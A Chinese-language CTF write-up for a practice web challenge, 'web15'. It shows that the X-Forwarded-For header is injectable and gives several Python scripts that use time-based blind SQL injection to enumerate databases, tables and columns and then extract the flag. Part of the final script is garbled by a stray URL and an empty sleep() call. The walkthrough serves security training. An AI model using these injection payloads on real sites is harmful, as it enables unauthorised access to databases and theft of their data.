CTF练习平台——web15 CTF练习平台——web15

1、web15

文章图片
image
这道题的题目已经将源代码给我们了
可以看出这是time-based盲注
点开链接，我们看到

文章图片
image
想到可以尝试各种IP的HTTP头：

X-Forwarded-ForClient-IPx-remote-IPx-originating-IPx-remote-addr

发现X-Forwarded-For可以伪造

文章图片
image 发现注入的语句原封不动的显示在页面中，但如果注入的语句中有逗号，则逗号后面的内容就不会显示在页面中

文章图片
image 逗号后面的内容被截掉了
然后就可以写一个脚本爆破得到库名，表名和字段名了
【CTF练习平台——web15】首先我们来找一下数据库名

# -*- coding:utf-8 -*- import requests import string url = "http://120.24.86.145:8002/web15/" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation database=[]for database_number in range(0,100):#假设爆破前100个库 databasename='' for i in range(1,100):#爆破字符串长度，假设不超过100长度 flag=0 for str in guess:#爆破该位置的字符 #print 'trying ',str headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)} try: res=requests.get(url,headers=headers,timeout=4) except: databasename+=str flag=1 print('正在扫描第%d个数据库名，the databasename now is '%(database_number+1) ,databasename) break if flag==0: break database.append(databasename) if i==1 and flag==0: print('扫描完成') breakfor i in range(len(database)): print(database[i])

找到的数据库为

文章图片
TIM截图20180202145718.png 这里有两个数据库，我们先尝试information_schema这个数据库
用脚本跑一下有多少列

# -*- coding:utf-8 -*- import requests import string url = "http://120.24.86.145:8002/web15/" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation database=[]for table_number in range(0,500): print('trying',table_number) headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)} try: res=requests.get(url,headers=headers,timeout=4) except: print(table_number) break

文章图片
TIM截图20180202154423.png 一共42列，一般猜测在最后，前面应该都是information_schema里的那些
尝试一下

# -*- coding:utf-8 -*- import requests import string url = "http://120.24.86.145:8002/web15/" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation tables=[] ![TIM截图20180202153421.png](http://upload-images.jianshu.io/upload_images/9168776-0183444b8a11751c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)for table_number in range(41,42):#假设从第60个开始 tablename='' for i in range(1,100):#爆破字符串长度，假设不超过100长度 flag=0 for str in guess:#爆破该位置的字符 headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)} try: res=requests.get(url,headers=headers,timeout=4) except: tablename+=str flag=1 print('正在扫描第%d个数据库名，the tablename now is '%(table_number+1) ,tablename) break if flag==0: break tables.append(tablename) if i==1 and flag==0: print('扫描完成') breakfor i in range(len(tables)): print(tables[i])

文章图片
TIM截图20180202153421.png
找到了flag表
接下来求列名
再跑一下有多少列

# -*- coding:utf-8 -*- import requests import string url = "http://120.24.86.145:8002/web15/" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation database=[]for table_number in range(0,1000): print('trying',table_number) headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)} try: res=requests.get(url,headers=headers,timeout=4) except: print(table_number) break

文章图片
TIM截图20180202155052.png
一共483列
老思路，直接暴力最后一个

# -*- coding:utf-8 -*- import requests import string url = "http://120.24.86.145:8002/web15/" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation columns=[]for column_number in range(482,483):#假设从第60个开始 cloumnname='' for i in range(1,100):#爆破字符串长度，假设不超过100长度 flag=0 for str in guess:#爆破该位置的字符 #print 'trying',str headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)} try: res=requests.get(url,headers=headers,timeout=4) except: cloumnname+=str flag=1 print('正在扫描第%d个列名，the cloumnname now is '%(column_number+1) ,cloumnname) break if flag==0: break columns.append(cloumnname) if i==1 and flag==0: print('扫描完成') breakfor i in range(len(columns)): print(columns[i])

文章图片
TIM截图20180202155419.png 然后直接暴力找flag就行了

import requests import string words = string.ascii_lowercase + string.ascii_uppercase + string.digits url = 'http://120.24.86.145:8002/web15/' answer='' for length in range(1,100): flag=0 for key in words: datahttps://www.it610.com/article/= "'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep() else 1 end) and '1'='1".format(length,str(key)) headers={ "X-FORWARDED-FOR": data } try: res=requests.get(url,headers=headers,timeout=5) except Exception as e: answer+=key print(answer) flag=1 break if flag==0 and answer!= '': break; print(answer)